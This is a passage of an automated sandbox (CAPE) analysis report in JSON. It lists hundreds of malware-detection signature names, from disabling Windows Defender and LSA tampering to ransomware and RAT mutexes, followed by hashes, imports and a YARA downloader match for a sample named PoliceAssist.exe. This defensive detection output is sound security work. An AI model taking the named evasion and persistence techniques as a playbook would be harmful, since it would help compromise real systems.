        "time": 0.0
      },
      {
        "name": "disables_backups",
        "time": 0.001
      },
      {
        "name": "disables_browser_warn",
        "time": 0.001
      },
      {
        "name": "disables_context_menus",
        "time": 0.0
      },
      {
        "name": "disables_cpl_disable",
        "time": 0.0
      },
      {
        "name": "disables_crashdumps",
        "time": 0.0
      },
      {
        "name": "disables_event_logging",
        "time": 0.0
      },
      {
        "name": "disables_folder_options",
        "time": 0.0
      },
      {
        "name": "disables_notificationcenter",
        "time": 0.0
      },
      {
        "name": "disables_power_options",
        "time": 0.001
      },
      {
        "name": "disables_restore_default_state",
        "time": 0.0
      },
      {
        "name": "disables_run_command",
        "time": 0.0
      },
      {
        "name": "disables_smartscreen",
        "time": 0.0
      },
      {
        "name": "disables_startmenu_search",
        "time": 0.0
      },
      {
        "name": "disables_system_restore",
        "time": 0.0
      },
      {
        "name": "disables_uac",
        "time": 0.0
      },
      {
        "name": "disables_wer",
        "time": 0.0
      },
      {
        "name": "disables_windows_defender",
        "time": 0.0
      },
      {
        "name": "disables_windows_defender_logging",
        "time": 0.0
      },
      {
        "name": "removes_windows_defender_contextmenu",
        "time": 0.0
      },
      {
        "name": "removes_windows_defender_updates",
        "time": 0.0
      },
      {
        "name": "windows_defender_powershell",
        "time": 0.0
      },
      {
        "name": "disables_windows_file_protection",
        "time": 0.0
      },
      {
        "name": "disables_windowsupdate",
        "time": 0.0
      },
      {
        "name": "disables_winfirewall",
        "time": 0.0
      },
      {
        "name": "adfind_domain_enumeration",
        "time": 0.0
      },
      {
        "name": "domain_enumeration_commands",
        "time": 0.0
      },
      {
        "name": "andromut_mutexes",
        "time": 0.0
      },
      {
        "name": "downloader_cabby",
        "time": 0.0
      },
      {
        "name": "phorpiex_mutexes",
        "time": 0.0
      },
      {
        "name": "protonbot_mutexes",
        "time": 0.0
      },
      {
        "name": "driver_filtermanager",
        "time": 0.0
      },
      {
        "name": "dropper",
        "time": 0.0
      },
      {
        "name": "dll_archive_execution",
        "time": 0.0
      },
      {
        "name": "lnk_archive_execution",
        "time": 0.0
      },
      {
        "name": "script_archive_execution",
        "time": 0.0
      },
      {
        "name": "excel4_macro_urls",
        "time": 0.0
      },
      {
        "name": "escalate_privilege_via_ntlm_relay",
        "time": 0.0
      },
      {
        "name": "spooler_access",
        "time": 0.0
      },
      {
        "name": "spooler_svc_start",
        "time": 0.0
      },
      {
        "name": "mapped_drives_uac",
        "time": 0.0
      },
      {
        "name": "hides_recycle_bin_icon",
        "time": 0.0
      },
      {
        "name": "apocalypse_stealer_file_behavior",
        "time": 0.0
      },
      {
        "name": "arkei_files",
        "time": 0.0
      },
      {
        "name": "azorult_mutexes",
        "time": 0.001
      },
      {
        "name": "infostealer_bitcoin",
        "time": 0.004
      },
      {
        "name": "cryptbot_files",
        "time": 0.0
      },
      {
        "name": "echelon_files",
        "time": 0.001
      },
      {
        "name": "infostealer_ftp",
        "time": 0.063
      },
      {
        "name": "infostealer_im",
        "time": 0.035
      },
      {
        "name": "infostealer_mail",
        "time": 0.011
      },
      {
        "name": "masslogger_files",
        "time": 0.0
      },
      {
        "name": "poullight_files",
        "time": 0.003
      },
      {
        "name": "purplewave_mutexes",
        "time": 0.0
      },
      {
        "name": "quilclipper_mutexes",
        "time": 0.0
      },
      {
        "name": "qulab_files",
        "time": 0.002
      },
      {
        "name": "qulab_mutexes",
        "time": 0.0
      },
      {
        "name": "asyncrat_mutex",
        "time": 0.0
      },
      {
        "name": "Evade_Execution_Via_ASPNet_Compiler",
        "time": 0.0
      },
      {
        "name": "Evade_Execute_Via_DeviceCredentialDeployment",
        "time": 0.0
      },
      {
        "name": "Evade_Execution_Via_Filter_Manager_Control",
        "time": 0.0
      },
      {
        "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper",
        "time": 0.0
      },
      {
        "name": "execute_binary_via_appvlp",
        "time": 0.0
      },
      {
        "name": "execute_binary_via_pcalua",
        "time": 0.0
      },
      {
        "name": "Execute_Binary_Via_OpenSSH",
        "time": 0.0
      },
      {
        "name": "execute_binary_via_pcalua",
        "time": 0.0
      },
      {
        "name": "Execute_Binary_Via_PesterPSModule",
        "time": 0.0
      },
      {
        "name": "Execute_Binary_Via_ScriptRunner",
        "time": 0.0
      },
      {
        "name": "execute_binary_via_ttdinject",
        "time": 0.0
      },
      {
        "name": "Execute_Binary_Via_VisualStudioLiveShare",
        "time": 0.0
      },
      {
        "name": "Execute_Msiexec_Via_Explorer",
        "time": 0.0
      },
      {
        "name": "execute_remote_msi",
        "time": 0.0
      },
      {
        "name": "execute_suspicious_powershell_via_runscripthelper",
        "time": 0.0
      },
      {
        "name": "execute_suspicious_powershell_via_sqlps",
        "time": 0.0
      },
      {
        "name": "Indirect_Command_Execution_Via_ConsoleWindowHost",
        "time": 0.0
      },
      {
        "name": "Perform_Malicious_Activities_Via_Headless_Browser",
        "time": 0.0
      },
      {
        "name": "Register_DLL_Via_CertOC",
        "time": 0.0
      },
      {
        "name": "Register_DLL_Via_MSIEXEC",
        "time": 0.0
      },
      {
        "name": "Register_DLL_Via_Odbcconf",
        "time": 0.0
      },
      {
        "name": "Scriptlet_Proxy_Execution_Via_Pubprn",
        "time": 0.0
      },
      {
        "name": "ie_martian_children",
        "time": 0.0
      },
      {
        "name": "office_martian_children",
        "time": 0.0
      },
      {
        "name": "mimics_icon",
        "time": 0.0
      },
      {
        "name": "masquerade_process_name",
        "time": 0.005
      },
      {
        "name": "mimikatz_modules",
        "time": 0.0
      },
      {
        "name": "ms_office_cmd_rce",
        "time": 0.0
      },
      {
        "name": "mount_copy_to_webdav_share",
        "time": 0.0
      },
      {
        "name": "potential_protocol_tunneling_via_legit_utilities",
        "time": 0.0
      },
      {
        "name": "potential_protocol_tunneling_via_qemu",
        "time": 0.0
      },
      {
        "name": "suspicious_execution_via_dotnet_remoting",
        "time": 0.0
      },
      {
        "name": "modify_certs",
        "time": 0.0
      },
      {
        "name": "dotnet_clr_usagelog_regkeys",
        "time": 0.0
      },
      {
        "name": "modify_hostfile",
        "time": 0.0
      },
      {
        "name": "modify_oem_information",
        "time": 0.0
      },
      {
        "name": "modify_security_center_warnings",
        "time": 0.0
      },
      {
        "name": "modify_uac_prompt",
        "time": 0.0
      },
      {
        "name": "network_dns_blockchain",
        "time": 0.0
      },
      {
        "name": "network_dns_opennic",
        "time": 0.001
      },
      {
        "name": "network_dns_paste_site",
        "time": 0.0
      },
      {
        "name": "network_dns_reverse_proxy",
        "time": 0.0
      },
      {
        "name": "network_dns_temp_file_storage",
        "time": 0.001
      },
      {
        "name": "network_dns_temp_urldns",
        "time": 0.0
      },
      {
        "name": "network_dns_url_shortener",
        "time": 0.001
      },
      {
        "name": "network_dns_doh_tls",
        "time": 0.0
      },
      {
        "name": "suspicious_tld",
        "time": 0.006
      },
      {
        "name": "network_tor_service",
        "time": 0.0
      },
      {
        "name": "office_code_page",
        "time": 0.0
      },
      {
        "name": "office_addinloading",
        "time": 0.0
      },
      {
        "name": "office_perfkey",
        "time": 0.0
      },
      {
        "name": "office_macro",
        "time": 0.0
      },
      {
        "name": "changes_trust_center_settings",
        "time": 0.0
      },
      {
        "name": "disables_vba_trust_access",
        "time": 0.0
      },
      {
        "name": "office_macro_autoexecution",
        "time": 0.0
      },
      {
        "name": "office_macro_ioc",
        "time": 0.0
      },
      {
        "name": "office_macro_malicious_prediction",
        "time": 0.0
      },
      {
        "name": "office_macro_suspicious",
        "time": 0.0
      },
      {
        "name": "rtf_aslr_bypass",
        "time": 0.0
      },
      {
        "name": "rtf_anomaly_characterset",
        "time": 0.0
      },
      {
        "name": "rtf_anomaly_version",
        "time": 0.0
      },
      {
        "name": "rtf_embedded_content",
        "time": 0.0
      },
      {
        "name": "rtf_embedded_office_file",
        "time": 0.0
      },
      {
        "name": "rtf_exploit_static",
        "time": 0.0
      },
      {
        "name": "office_security",
        "time": 0.0
      },
      {
        "name": "accesses_office_username",
        "time": 0.0
      },
      {
        "name": "office_anomalous_feature",
        "time": 0.0
      },
      {
        "name": "office_dde_command",
        "time": 0.0
      },
      {
        "name": "packer_armadillo_mutex",
        "time": 0.0
      },
      {
        "name": "packer_armadillo_regkey",
        "time": 0.001
      },
      {
        "name": "persistence_ads",
        "time": 0.0
      },
      {
        "name": "persistence_safeboot",
        "time": 0.0
      },
      {
        "name": "persistence_ifeo",
        "time": 0.0
      },
      {
        "name": "persistence_silent_process_exit",
        "time": 0.0
      },
      {
        "name": "persistence_rdp_registry",
        "time": 0.0
      },
      {
        "name": "persistence_rdp_shadowing",
        "time": 0.0
      },
      {
        "name": "persistence_service",
        "time": 0.0
      },
      {
        "name": "persistence_shim_database",
        "time": 0.0
      },
      {
        "name": "powerpool_mutexes",
        "time": 0.0
      },
      {
        "name": "powershell_scriptblock_logging",
        "time": 0.0
      },
      {
        "name": "powershell_command_suspicious",
        "time": 0.0
      },
      {
        "name": "powershell_history_save_mod",
        "time": 0.0
      },
      {
        "name": "powershell_renamed",
        "time": 0.0
      },
      {
        "name": "powershell_reversed",
        "time": 0.0
      },
      {
        "name": "powershell_variable_obfuscation",
        "time": 0.0
      },
      {
        "name": "prevents_safeboot",
        "time": 0.0
      },
      {
        "name": "cmdline_process_discovery",
        "time": 0.0
      },
      {
        "name": "cryptomix_mutexes",
        "time": 0.0
      },
      {
        "name": "dharma_mutexes",
        "time": 0.0
      },
      {
        "name": "ransomware_extensions",
        "time": 0.006
      },
      {
        "name": "ransomware_files",
        "time": 0.008
      },
      {
        "name": "fonix_mutexes",
        "time": 0.0
      },
      {
        "name": "gandcrab_mutexes",
        "time": 0.0
      },
      {
        "name": "germanwiper_mutexes",
        "time": 0.0
      },
      {
        "name": "medusalocker_mutexes",
        "time": 0.0
      },
      {
        "name": "medusalocker_regkeys",
        "time": 0.001
      },
      {
        "name": "nemty_mutexes",
        "time": 0.0
      },
      {
        "name": "nemty_regkeys",
        "time": 0.0
      },
      {
        "name": "pysa_mutexes",
        "time": 0.0
      },
      {
        "name": "ransomware_radamant",
        "time": 0.0
      },
      {
        "name": "ransomware_recyclebin",
        "time": 0.0
      },
      {
        "name": "revil_mutexes",
        "time": 0.001
      },
      {
        "name": "ransomware_revil_regkey",
        "time": 0.0
      },
      {
        "name": "satan_mutexes",
        "time": 0.0
      },
      {
        "name": "snake_ransom_mutexes",
        "time": 0.0
      },
      {
        "name": "stop_ransom_mutexes",
        "time": 0.0
      },
      {
        "name": "stop_ransomware_cmd",
        "time": 0.0
      },
      {
        "name": "ransomware_stopdjvu",
        "time": 0.0
      },
      {
        "name": "rat_beebus_mutexes",
        "time": 0.0
      },
      {
        "name": "blacknet_mutexes",
        "time": 0.0
      },
      {
        "name": "blackrat_mutexes",
        "time": 0.0
      },
      {
        "name": "crat_mutexes",
        "time": 0.0
      },
      {
        "name": "dcrat_files",
        "time": 0.0
      },
      {
        "name": "dcrat_mutexes",
        "time": 0.0
      },
      {
        "name": "rat_fynloski_mutexes",
        "time": 0.0
      },
      {
        "name": "limerat_mutexes",
        "time": 0.0
      },
      {
        "name": "limerat_regkeys",
        "time": 0.002
      },
      {
        "name": "lodarat_file_behavior",
        "time": 0.0
      },
      {
        "name": "modirat_behavior",
        "time": 0.001
      },
      {
        "name": "njrat_regkeys",
        "time": 0.0
      },
      {
        "name": "obliquerat_files",
        "time": 0.001
      },
      {
        "name": "obliquerat_mutexes",
        "time": 0.0
      },
      {
        "name": "parallax_mutexes",
        "time": 0.0
      },
      {
        "name": "rat_pcclient",
        "time": 0.001
      },
      {
        "name": "rat_plugx_mutexes",
        "time": 0.0
      },
      {
        "name": "rat_poisonivy_mutexes",
        "time": 0.0
      },
      {
        "name": "rat_quasar_mutexes",
        "time": 0.0
      },
      {
        "name": "ratsnif_mutexes",
        "time": 0.0
      },
      {
        "name": "rat_spynet",
        "time": 0.001
      },
      {
        "name": "venomrat_mutexes",
        "time": 0.0
      },
      {
        "name": "warzonerat_files",
        "time": 0.0
      },
      {
        "name": "warzonerat_regkeys",
        "time": 0.001
      },
      {
        "name": "xpertrat_files",
        "time": 0.0
      },
      {
        "name": "xpertrat_mutexes",
        "time": 0.0
      },
      {
        "name": "rat_xtreme_mutexes",
        "time": 0.0
      },
      {
        "name": "recon_fingerprint",
        "time": 0.002
      },
      {
        "name": "remcos_files",
        "time": 0.0
      },
      {
        "name": "remcos_mutexes",
        "time": 0.0
      },
      {
        "name": "remcos_regkeys",
        "time": 0.001
      },
      {
        "name": "rdptcp_key",
        "time": 0.0
      },
      {
        "name": "uses_rdp_clip",
        "time": 0.0
      },
      {
        "name": "uses_remote_desktop_session",
        "time": 0.0
      },
      {
        "name": "removes_networking_icon",
        "time": 0.0
      },
      {
        "name": "removes_pinned_programs",
        "time": 0.0
      },
      {
        "name": "removes_security_maintenance_icon",
        "time": 0.0
      },
      {
        "name": "removes_startmenu_defaults",
        "time": 0.0
      },
      {
        "name": "removes_username_startmenu",
        "time": 0.0
      },
      {
        "name": "spicyhotpot_behavior",
        "time": 0.0
      },
      {
        "name": "sniffer_winpcap",
        "time": 0.0
      },
      {
        "name": "spreading_autoruninf",
        "time": 0.0
      },
      {
        "name": "stealth_hidden_extension",
        "time": 0.0
      },
      {
        "name": "stealth_hiddenreg",
        "time": 0.0
      },
      {
        "name": "stealth_hide_notifications",
        "time": 0.0
      },
      {
        "name": "stealth_webhistory",
        "time": 0.0
      },
      {
        "name": "sysinternals_psexec",
        "time": 0.0
      },
      {
        "name": "sysinternals_tools",
        "time": 0.0
      },
      {
        "name": "language_check_registry",
        "time": 0.0
      },
      {
        "name": "tampers_etw",
        "time": 0.001
      },
      {
        "name": "lsa_tampering",
        "time": 0.0
      },
      {
        "name": "tampers_powershell_logging",
        "time": 0.0
      },
      {
        "name": "targeted_flame",
        "time": 0.0
      },
      {
        "name": "territorial_disputes_sigs",
        "time": 0.055
      },
      {
        "name": "trickbot_mutex",
        "time": 0.0
      },
      {
        "name": "fleercivet_mutex",
        "time": 0.0
      },
      {
        "name": "lokibot_mutexes",
        "time": 0.001
      },
      {
        "name": "ursnif_behavior",
        "time": 0.001
      },
      {
        "name": "uses_adfind",
        "time": 0.0
      },
      {
        "name": "uses_ms_protocol",
        "time": 0.0
      },
      {
        "name": "neshta_mutexes",
        "time": 0.0
      },
      {
        "name": "renamer_mutexes",
        "time": 0.0
      },
      {
        "name": "owa_web_shell_files",
        "time": 0.0
      },
      {
        "name": "web_shell_files",
        "time": 0.0
      },
      {
        "name": "web_shell_processes",
        "time": 0.0
      },
      {
        "name": "dotnet_csc_build",
        "time": 0.0
      },
      {
        "name": "mavinject_lolbin",
        "time": 0.0
      },
      {
        "name": "multiple_explorer_instances",
        "time": 0.0
      },
      {
        "name": "script_tool_executed",
        "time": 0.0
      },
      {
        "name": "suspicious_certutil_use",
        "time": 0.0
      },
      {
        "name": "suspicious_command_tools",
        "time": 0.001
      },
      {
        "name": "suspicious_mpcmdrun_use",
        "time": 0.0
      },
      {
        "name": "suspicious_ping_use",
        "time": 0.0
      },
      {
        "name": "uses_powershell_copyitem",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities",
        "time": 0.001
      },
      {
        "name": "uses_windows_utilities_appcmd",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_csvde_ldifde",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_cipher",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_clickonce",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_curl",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_dsquery",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_esentutl",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_finger",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_mode",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_ntdsutil",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_nltest",
        "time": 0.0
      },
      {
        "name": "uses_windows_utilities_xcopy",
        "time": 0.0
      },
      {
        "name": "wmic_command_suspicious",
        "time": 0.0
      },
      {
        "name": "scrcons_wmi_script_consumer",
        "time": 0.0
      },
      {
        "name": "allaple_mutexes",
        "time": 0.0
      }
    ],
    "reporting": [
      {
        "name": "BinGraph",
        "time": 0.0
      }
    ]
  },
  "target": {
    "category": "file",
    "file": {
      "name": "PoliceAssist.exe",
      "path": "/opt/CAPEv2/storage/binaries/67f06666b122cdba28954592ec2c52964d0fbbc48e39974cedde8ef7a508dd9d",
      "guest_paths": "",
      "size": 1239040,
      "crc32": "16BB423F",
      "md5": "ef6987bd5b4f3d74b8be32886b5ea6b9",
      "sha1": "441fdcf973599dd39627e41607ea92ce2c75ff6e",
      "sha256": "67f06666b122cdba28954592ec2c52964d0fbbc48e39974cedde8ef7a508dd9d",
      "sha512": "4a633957c21aec0633484230a0102a4d9e55b25f0735e0f6dfac8845feb22d0f8f29b9d97fbbd08a2c47a1f9f59023be67a70889ddd4a3718d44a5edae8f26d3",
      "rh_hash": null,
      "ssdeep": "24576:+dofGAmSIQ177wZ+A7MjiiRDXU/Sat5RgsLSmIOHsU5zMmX1xYwncqKvGqVUy:+dofGbSIQ177wZvYjiiRDXASat5RgsLw",
      "type": "PE32+ executable (GUI) x86-64, for MS Windows",
      "yara": [
        {
          "name": "INDICATOR_SUSPICIOUS_AHK_Downloader",
          "meta": {
            "description": "Detects AutoHotKey binaries acting as second stage droppers",
            "author": "ditekSHen"
          },
          "strings": [
            "URLDownloadToFile, http",
            ">\u0000A\u0000U\u0000T\u0000O\u0000H\u0000O\u0000T\u0000K\u0000E\u0000Y\u0000 \u0000S\u0000C\u0000R\u0000I\u0000P\u0000T\u0000<\u0000",
            "o\u0000p\u0000e\u0000n\u0000 \u0000\"\u0000%\u0000s\u0000\"\u0000 \u0000a\u0000l\u0000i\u0000a\u0000s\u0000 \u0000A\u0000H\u0000K\u0000_\u0000P\u0000l\u0000a\u0000y\u0000M\u0000e\u0000",
            "A\u0000H\u0000K\u0000 \u0000K\u0000e\u0000y\u0000b\u0000d\u0000",
            "A\u0000H\u0000K\u0000 \u0000M\u0000o\u0000u\u0000s\u0000e\u0000"
          ],
          "addresses": {
            "d1": 1231325,
            "s1": 1204786,
            "s2": 970512,
            "s3": 934072
          }
        }
      ],
      "cape_yara": [],
      "clamav": [],
      "tlsh": "T134458D0733A6C0E8DF6790F2CA295223D7727814173897DB64E0692DDFA3EA15B3A711",
      "sha3_384": "edc36951bf16d92485aa745abe6f9aa1bbfc41198ddf245a35c5a44ef489b92d1dd91c5e11d0bc0391317f994f09be6f",
      "pe": {
        "guest_signers": {
          "aux_sha1": null,
          "aux_timestamp": null,
          "aux_valid": false,
          "aux_error": true,
          "aux_error_desc": "No signature found.",
          "aux_signers": []
        },
        "digital_signers": [],
        "imagebase": "0x140000000",
        "entrypoint": "0x000cdb10",
        "ep_bytes": "4883ec28e8076600004883c428e952fe",
        "peid_signatures": null,
        "reported_checksum": "0x00000000",
        "actual_checksum": "0x0013bc6e",
        "osversion": "5.2",
        "pdbpath": null,
        "imports": {
          "WSOCK32": {
            "dll": "WSOCK32.dll",
            "imports": [
              {
                "address": "0x1400e0e30",
                "name": "gethostbyname"
              },
              {
                "address": "0x1400e0e38",
                "name": "inet_ntoa"
              },
              {
                "address": "0x1400e0e40",
                "name": "WSACleanup"
              },
              {
                "address": "0x1400e0e48",
                "name": "gethostname"
              },
              {
                "address": "0x1400e0e50",
                "name": "WSAStartup"
              }
            ]
          },
          "WINMM": {
            "dll": "WINMM.dll",
            "imports": [
              {
                "address": "0x1400e0dc8",
                "name": "mixerGetLineInfoW"
              },
              {
                "address": "0x1400e0dd0",
                "name": "mixerGetDevCapsW"
              },
              {
                "address": "0x1400e0dd8",
                "name": "mixerOpen"
              },
              {
                "address": "0x1400e0de0",
                "name": "mciSendStringW"
              },
              {
                "address": "0x1400e0de8",
                "name": "joyGetPosEx"
              },
              {
                "address": "0x1400e0df0",
                "name": "mixerGetLineControlsW"
              },
              {
                "address": "0x1400e0df8",
                "name": "mixerGetControlDetailsW"
              },
              {
                "address": "0x1400e0e00",
                "name": "mixerSetControlDetails"
              },
              {
                "address": "0x1400e0e08",
                "name": "waveOutGetVolume"
              },
              {
                "address": "0x1400e0e10",
                "name": "mixerClose"
              },
              {
                "address": "0x1400e0e18",
                "name": "waveOutSetVolume"
              },
              {
                "address": "0x1400e0e20",
                "name": "joyGetDevCapsW"
              }
            ]
          },
          "VERSION": {
            "dll": "VERSION.dll",
            "imports": [
              {
                "address": "0x1400e0d78",
                "name": "GetFileVersionInfoW"
              },
              {
                "address": "0x1400e0d80",
                "name": "VerQueryValueW"
              },
              {
                "address": "0x1400e0d88",
                "name": "GetFileVersionInfoSizeW"
              }
            ]
          },
          "COMCTL32": {
            "dll": "COMCTL32.dll",
            "imports": [
              {
                "address": "0x1400e00a0",
                "name": "ImageList_Create"
              },
              {
                "address": "0x1400e00a8",
                "name": "CreateStatusWindowW"
              },
              {
                "address": "0x1400e00b0",
                "name": "ImageList_ReplaceIcon"
              },
              {
                "address": "0x1400e00b8",
                "name": "ImageList_GetIconSize"
              },
              {
                "address": "0x1400e00c0",
                "name": "ImageList_Destroy"
              },
              {
                "address": "0x1400e00c8",
                "name": "ImageList_AddMasked"
              }
            ]
          },
          "PSAPI": {
            "dll": "PSAPI.DLL",
            "imports": [
              {
                "address": "0x1400e0780",
                "name": "GetProcessImageFileNameW"
              },
              {
                "address": "0x1400e0788",
                "name": "GetModuleBaseNameW"
              },
              {
                "address": "0x1400e0790",
                "name": "GetModuleFileNameExW"
              }
            ]
          },
          "WININET": {
            "dll": "WININET.dll",
            "imports": [
              {
                "address": "0x1400e0d98",
                "name": "InternetOpenW"
              },
              {
                "address": "0x1400e0da0",
                "name": "InternetOpenUrlW"
              },
              {
                "address": "0x1400e0da8",
                "name": "InternetCloseHandle"
              },
              {
                "address": "0x1400e0db0",
                "name": "InternetReadFileExA"
              },
              {
                "address": "0x1400e0db8",
                "name": "InternetReadFile"
              }
            ]
          },
          "KERNEL32": {
            "dll": "KERNEL32.dll",
            "imports": [
              {
                "address": "0x1400e0210",
                "name": "GetModuleFileNameW"
              },
              {
                "address": "0x1400e0218",
                "name": "GetSystemTimeAsFileTime"
              },
              {
                "address": "0x1400e0220",
                "name": "FindResourceW"
              },
              {
                "address": "0x1400e0228",
                "name": "SizeofResource"
              },
              {
                "address": "0x1400e0230",
                "name": "LoadResource"
              },
              {
                "address": "0x1400e0238",
                "name": "LockResource"
              },
              {
                "address": "0x1400e0240",
                "name": "GetFullPathNameW"
              },
              {
                "address": "0x1400e0248",
                "name": "GetShortPathNameW"
              },
              {
                "address": "0x1400e0250",
                "name": "FindFirstFileW"
              },
              {
                "address": "0x1400e0258",
                "name": "FindNextFileW"
              },
              {
                "address": "0x1400e0260",
                "name": "FindClose"
              },
              {
                "address": "0x1400e0268",
                "name": "FileTimeToLocalFileTime"
              },
              {
                "address": "0x1400e0270",
                "name": "SetEnvironmentVariableW"
              },
              {
                "address": "0x1400e0278",
                "name": "Beep"
              },
              {
                "address": "0x1400e0280",
                "name": "MoveFileW"
              },
              {
                "address": "0x1400e0288",
                "name": "OutputDebugStringW"
              },
              {
                "address": "0x1400e0290",
                "name": "CreateProcessW"
              },
              {
                "address": "0x1400e0298",
                "name": "GetFileAttributesW"
              },
              {
                "address": "0x1400e02a0",
                "name": "WideCharToMultiByte"
              },
              {
                "address": "0x1400e02a8",
                "name": "MultiByteToWideChar"
              },
              {
                "address": "0x1400e02b0",
                "name": "GetExitCodeProcess"
              },
              {
                "address": "0x1400e02b8",
                "name": "WriteProcessMemory"
              },
              {
                "address": "0x1400e02c0",
                "name": "ReadProcessMemory"
              },
              {
                "address": "0x1400e02c8",
                "name": "GetCurrentProcessId"
              },
              {
                "address": "0x1400e02d0",
                "name": "OpenProcess"
              },
              {
                "address": "0x1400e02d8",
                "name": "TerminateProcess"
              },
              {
                "address": "0x1400e02e0",
                "name": "SetPriorityClass"
              },
              {
                "address": "0x1400e02e8",
                "name": "SetLastError"
              },
              {
                "address": "0x1400e02f0",
                "name": "GetEnvironmentVariableW"
              },
              {
                "address": "0x1400e02f8",
                "name": "GetLocalTime"
              },
              {
                "address": "0x1400e0300",
                "name": "GetDateFormatW"
              },
              {
                "address": "0x1400e0308",
                "name": "GetTimeFormatW"
              },
              {
                "address": "0x1400e0310",
                "name": "GetDiskFreeSpaceExW"
              },
              {
                "address": "0x1400e0318",
                "name": "SetVolumeLabelW"
              },
              {
                "address": "0x1400e0320",
                "name": "CreateFileW"
              },
              {
                "address": "0x1400e0328",
                "name": "DeviceIoControl"
              },
              {
                "address": "0x1400e0330",
                "name": "GetDriveTypeW"
              },
              {
                "address": "0x1400e0338",
                "name": "GetVolumeInformationW"
              },
              {
                "address": "0x1400e0340",
                "name": "GetDiskFreeSpaceW"
              },
              {
                "address": "0x1400e0348",
                "name": "GetCurrentDirectoryW"
              },
              {
                "address": "0x1400e0350",
                "name": "CreateDirectoryW"
              },
              {
                "address": "0x1400e0358",
                "name": "ReadFile"
              },
              {
                "address": "0x1400e0360",
                "name": "WriteFile"
              },
              {
                "address": "0x1400e0368",
                "name": "DeleteFileW"
              },
              {
                "address": "0x1400e0370",
                "name": "SetFileAttributesW"
              },
              {
                "address": "0x1400e0378",
                "name": "LocalFileTimeToFileTime"
              },
              {
                "address": "0x1400e0380",
                "name": "SetFileTime"
              },
              {
                "address": "0x1400e0388",
                "name": "DeleteCriticalSection"
              },
              {
                "address": "0x1400e0390",
                "name": "GetSystemTime"
              },
              {
                "address": "0x1400e0398",
                "name": "GetSystemDefaultUILanguage"
              },
              {
                "address": "0x1400e03a0",
                "name": "GetComputerNameW"
              },
              {
                "address": "0x1400e03a8",
                "name": "GetSystemWindowsDirectoryW"
              },
              {
                "address": "0x1400e03b0",
                "name": "GetTempPathW"
              },
              {
                "address": "0x1400e03b8",
                "name": "EnterCriticalSection"
              },
              {
                "address": "0x1400e03c0",
                "name": "LeaveCriticalSection"
              },
              {
                "address": "0x1400e03c8",
                "name": "VirtualProtect"
              },
              {
                "address": "0x1400e03d0",
                "name": "QueryDosDeviceW"
              },
              {
                "address": "0x1400e03d8",
                "name": "CompareStringW"
              },
              {
                "address": "0x1400e03e0",
                "name": "RemoveDirectoryW"
              },
              {
                "address": "0x1400e03e8",
                "name": "CopyFileW"
              },
              {
                "address": "0x1400e03f0",
                "name": "GetCurrentProcess"
              },
              {
                "address": "0x1400e03f8",
                "name": "CreateToolhelp32Snapshot"
              },
              {
                "address": "0x1400e0400",
                "name": "Process32FirstW"
              },
              {
                "address": "0x1400e0408",
                "name": "Process32NextW"
              },
              {
                "address": "0x1400e0410",
                "name": "FormatMessageW"
              },
              {
                "address": "0x1400e0418",
                "name": "GetPrivateProfileStringW"
              },
              {
                "address": "0x1400e0420",
                "name": "GetPrivateProfileSectionW"
              },
              {
                "address": "0x1400e0428",
                "name": "GetPrivateProfileSectionNamesW"
              },
              {
                "address": "0x1400e0430",
                "name": "WritePrivateProfileStringW"
              },
              {
                "address": "0x1400e0438",
                "name": "WritePrivateProfileSectionW"
              },
              {
                "address": "0x1400e0440",
                "name": "SetEndOfFile"
              },
              {
                "address": "0x1400e0448",
                "name": "GetACP"
              },
              {
                "address": "0x1400e0450",
                "name": "GetFileType"
              },
              {
                "address": "0x1400e0458",
                "name": "GetStdHandle"
              },
              {
                "address": "0x1400e0460",
                "name": "SetFilePointerEx"
              },
              {
                "address": "0x1400e0468",
                "name": "SystemTimeToFileTime"
              },
              {
                "address": "0x1400e0470",
                "name": "FileTimeToSystemTime"
              },
              {
                "address": "0x1400e0478",
                "name": "GetFileSize"
              },
              {
                "address": "0x1400e0480",
                "name": "IsWow64Process"
              },
              {
                "address": "0x1400e0488",
                "name": "VirtualAllocEx"
              },
              {
                "address": "0x1400e0490",
                "name": "VirtualFreeEx"
              },
              {
                "address": "0x1400e0498",
                "name": "EnumResourceNamesW"
              },
              {
                "address": "0x1400e04a0",
                "name": "LoadLibraryExW"
              },
              {
                "address": "0x1400e04a8",
                "name": "GlobalSize"
              },
              {
                "address": "0x1400e04b0",
                "name": "HeapReAlloc"
              },
              {
                "address": "0x1400e04b8",
                "name": "EncodePointer"
              },
              {
                "address": "0x1400e04c0",
                "name": "HeapFree"
              },
              {
                "address": "0x1400e04c8",
                "name": "DecodePointer"
              },
              {
                "address": "0x1400e04d0",
                "name": "ExitProcess"
              },
              {
                "address": "0x1400e04d8",
                "name": "HeapAlloc"
              },
              {
                "address": "0x1400e04e0",
                "name": "IsValidCodePage"
              },
              {
                "address": "0x1400e04e8",
                "name": "FlsGetValue"
              },
              {
                "address": "0x1400e04f0",
                "name": "FlsSetValue"
              },
              {
                "address": "0x1400e04f8",
                "name": "FlsFree"
              },
              {
                "address": "0x1400e0500",
                "name": "FlsAlloc"
              },
              {
                "address": "0x1400e0508",
                "name": "UnhandledExceptionFilter"
              },
              {
                "address": "0x1400e0510",
                "name": "SetUnhandledExceptionFilter"
              },
              {
                "address": "0x1400e0518",
                "name": "IsDebuggerPresent"
              },
              {
                "address": "0x1400e0520",
                "name": "RtlVirtualUnwind"
              },
              {
                "address": "0x1400e0528",
                "name": "RtlLookupFunctionEntry"
              },
              {
                "address": "0x1400e0530",
                "name": "InitializeCriticalSection"
              },
              {
                "address": "0x1400e0538",
                "name": "GetCPInfo"
              },
              {
                "address": "0x1400e0540",
                "name": "GetVersionExW"
              },
              {
                "address": "0x1400e0548",
                "name": "GetModuleHandleW"
              },
              {
                "address": "0x1400e0550",
                "name": "FreeLibrary"
              },
              {
                "address": "0x1400e0558",
                "name": "GetProcAddress"
              },
              {
                "address": "0x1400e0560",
                "name": "LoadLibraryW"
              },
              {
                "address": "0x1400e0568",
